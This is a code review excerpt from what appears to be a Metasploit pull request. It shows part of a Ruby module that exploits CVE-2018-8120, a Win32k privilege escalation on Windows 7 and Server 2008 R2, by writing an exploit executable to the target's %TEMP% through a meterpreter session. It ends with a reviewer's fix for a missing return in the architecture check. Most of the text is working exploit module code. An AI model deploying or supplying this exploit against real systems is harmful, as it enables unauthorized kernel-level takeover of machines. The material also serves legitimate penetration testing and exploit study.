modules/exploits/windows/local/ms18_8120_win32k_privesc.rb

```diff
@@ -0,0 +1,134 @@
+      This module exploits elevation of privilege vulnerability that exists in Windows 7 and 2008 R2
+      when the Win32k component fails to properly handle objects in memory. An attacker who
+      successfully exploited this vulnerability could run arbitrary code in kernel mode. An
+      attacker could then install programs; view, change, or delete data; or create new
+      accounts with full user rights.
+
+      This module has been tested against windows 7 x64 and windows server 2008 R2 standard x64.
+    },
+    'License'         => MSF_LICENSE,
+    'Author'          => [
+        'unamer', # Exploit PoC
+        'bigric3', # Analysis and exploit
+        'Anton Cherepanov', # Vulnerability discovery
+        'Dhiraj Mishra <dhiraj@notsosecure.com>' # Metasploit module
+      ],
+    'Platform'        => 'win',
+    'SessionTypes'    => [ 'meterpreter' ],
+    'DefaultOptions'  => {
+        'EXITFUNC'    => 'thread'
+      },
+    'Targets'         => [
+        [ 'Windows 7 x64', { 'Arch' => ARCH_X64 } ],
+        [ 'Windows 7 x86', { 'Arch' => ARCH_X86 } ]
+      ],
+    'Payload'         => {
+        'Space'       => 4096,
+        'DisableNops' => true
+      },
+    'References'      => [
+        ['BID', '104034'],
+        ['CVE', '2018-8120'],
+        ['URL', 'https://github.com/unamer/CVE-2018-8120'],
+        ['URL', 'https://github.com/bigric3/cve-2018-8120'],
+        ['URL', 'http://bigric3.blogspot.com/2018/05/cve-2018-8120-analysis-and-exploit.html'],
+        ['URL', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8120']
+      ],
+    'DisclosureDate'  => 'May 9 2018',
+    'DefaultTarget'   => 0
+    ))
+  end
+
+  def validate_target
+    if is_system?
+      fail_with(Failure::None, 'Session is already elevated')
+    end
+
+    if sysinfo['OS'] =~ /XP/
+      fail_with(Failure::Unknown, 'The exploit binary does not support Windows XP')
+    end
+  end
+
+  def write_exe_to_target(rexe, rexename)
+    begin
+      vprint_warning("Writing file to %TEMP%")
+      print_good("Exploiting SetImeInfoEx Win32k NULL Pointer Dereference")
+      temprexe = "#{session.fs.file.expand_path("%TEMP%")}\\#{rexename}"
+      write_file_to_target(temprexe,rexe)
+    rescue
+      fail_with(Failure::Unknown, "Writing #{rexename} to disk was unsuccessful")
+    end
+
+    vprint_good("File path: #{temprexe}")
+    temprexe
+  end
+
+  def write_file_to_target(temprexe, rexe)
+    fd = session.fs.file.new(temprexe, "wb")
+    fd.write(rexe)
+    fd.close
+  end
+
+  def create_payload_from_file(exec)
+    vprint_status("Reading payload from file #{exec}")
+    File.read(exec)
+  end
+
+  def check_arch
+    sys_arch = sysinfo['Architecture']
+    if sys_arch == ARCH_X86
+      fail_with(Failure::BadConfig, "Invalid payload architecture") if payload_instance.arch.first == ARCH_X64
+
+      'CVE-2018-8120x86.exe'
+    elsif sys_arch == ARCH_X64
+      'CVE-2018-8120x86_64.exe' if session.arch == ARCH_X86
```

Comment:
This is unlikely to work as intended. Execution will continue as there is no `return`.

```ruby
    elsif sys_arch == ARCH_X64
      return 'CVE-2018-8120x86_64.exe' if session.arch == ARCH_X86

      'CVE-2018-8120x64.exe'
    else
```